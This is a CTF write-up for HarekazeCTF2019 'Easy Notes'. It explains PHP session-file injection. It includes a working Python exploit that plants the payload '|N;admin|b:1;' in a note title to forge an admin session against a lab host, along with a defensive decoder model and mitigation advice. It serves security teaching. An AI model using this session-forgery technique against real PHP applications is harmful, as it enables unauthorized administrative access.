[HarekazeCTF2019]Easy Notes

  • session deserialization

PHP stores session data as: key name + vertical bar (`|`) + the value as produced by the serialize() function. Because anything before a `|` is taken as a key name, this layout makes it possible to forge an admin session.

exp:

import re
import requests

URL = 'http://e2cec884-8829-4092-a14e-072d64de4f5f.node4.buuoj.cn:81/'

while True:
    # login as sess_
    sess = requests.Session()
    sess.post(URL + 'login.php', data={
        'user': 'sess_'
    })

    # make a crafted note
    sess.post(URL + 'add.php', data={
        'title': '|N;admin|b:1;',
        'body': 'hello'
    })

    # make a fake session
    r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
    print(r)

    sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
    print(sessid)

    # get the flag
    r = requests.get(URL + '?page=flag', cookies={
        'PHPSESSID': sessid
    }).content.decode('utf-8')
    flag = re.findall(r'flag\{.+\}', r)

    if len(flag) > 0:
        print(flag[0])
        break
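To make the "key|serialized value" point above concrete, here is an added example (not part of the writeup and not the challenge's own code): a small Python model of how PHP's default `php` session serialize handler reads a stored file, plus an audit helper that reports keys the application never set. The note layout `array('title' => ..., 'body' => ...)` inside a serialized list is an assumption about what export.php writes; the writeup does not show the file contents. Running `decode_php_session` over a benign export yields nothing, while the crafted title from the writeup yields `admin => True`, which is exactly why a user-controlled file that the session handler can reach is dangerous.

```python
import re


def unserialize_prefix(data: str, pos: int):
    """Decode one value in the subset of PHP serialize() output needed here:
    N; (null), b:0/1; (bool), i:<n>; (int), s:<len>:"<text>"; (string).
    Returns (value, position after the value); raises ValueError on malformed
    input, which is where PHP's php_var_unserialize() would fail."""
    tag = data[pos:pos + 2]
    if tag == "N;":
        return None, pos + 2
    if tag == "b:":
        m = re.match(r"b:([01]);", data[pos:])
        if not m:
            raise ValueError("bad bool at %d" % pos)
        return m.group(1) == "1", pos + m.end()
    if tag == "i:":
        m = re.match(r"i:(-?\d+);", data[pos:])
        if not m:
            raise ValueError("bad int at %d" % pos)
        return int(m.group(1)), pos + m.end()
    if tag == "s:":
        m = re.match(r's:(\d+):"', data[pos:])
        if not m:
            raise ValueError("bad string header at %d" % pos)
        n = int(m.group(1))              # ASCII assumed: byte length == char length
        start = pos + m.end()
        body = data[start:start + n]
        if len(body) != n or data[start + n:start + n + 2] != '";':
            raise ValueError("bad string body at %d" % pos)
        return body, start + n + 2
    raise ValueError("unsupported or malformed value at %d" % pos)


def decode_php_session(data: str) -> dict:
    """Model of the 'php' session handler's decode loop: read a key up to the
    next '|', unserialize one value, repeat. Whatever text precedes a '|'
    becomes a key name, however strange it looks; with no '|' left, PHP stops
    and keeps what it has already assigned."""
    session = {}
    pos = 0
    while pos < len(data):
        bar = data.find("|", pos)
        if bar == -1:
            break
        key = data[pos:bar]
        value, pos = unserialize_prefix(data, bar + 1)
        session[key] = value
    return session


def php_serialize_notes(notes) -> str:
    """serialize() output for a list of notes. Assumed layout (constructed for
    this example): array(array('title' => t, 'body' => b), ...)."""
    def s(v):
        return 's:%d:"%s";' % (len(v), v)     # ASCII assumed, see above
    items = "".join(
        'i:%d;a:2:{s:5:"title";%ss:4:"body";%s}' % (i, s(t), s(b))
        for i, (t, b) in enumerate(notes)
    )
    return "a:%d:{%s}" % (len(notes), items)


def injected_keys(dump: str, expected=("user",)) -> dict:
    """Audit helper: session keys a stored file would hand to $_SESSION that
    the application itself never sets (the expected list is an assumption)."""
    return {k: v for k, v in decode_php_session(dump).items() if k not in expected}


if __name__ == "__main__":
    benign = php_serialize_notes([("shopping", "milk")])      # constructed sample
    crafted = php_serialize_notes([("|N;admin|b:1;", "hello")])  # title from the writeup
    print("benign export   ->", decode_php_session(benign))
    print("crafted export  ->", decode_php_session(crafted))
    print("unexpected keys ->", injected_keys(crafted))
```

The first key recovered from the crafted export is the junk text `a:1:{i:0;a:2:{s:5:"title";s:13:"` with value `null`; the handler does not care, moves on, and the next pair is `admin|b:1;`. Two things follow for the defender: user-supplied files must never be written where the session save handler will read them (a `sess_` prefix in a filename is a red flag), and a `|` in data that can reach session storage is worth rejecting or escaping outright.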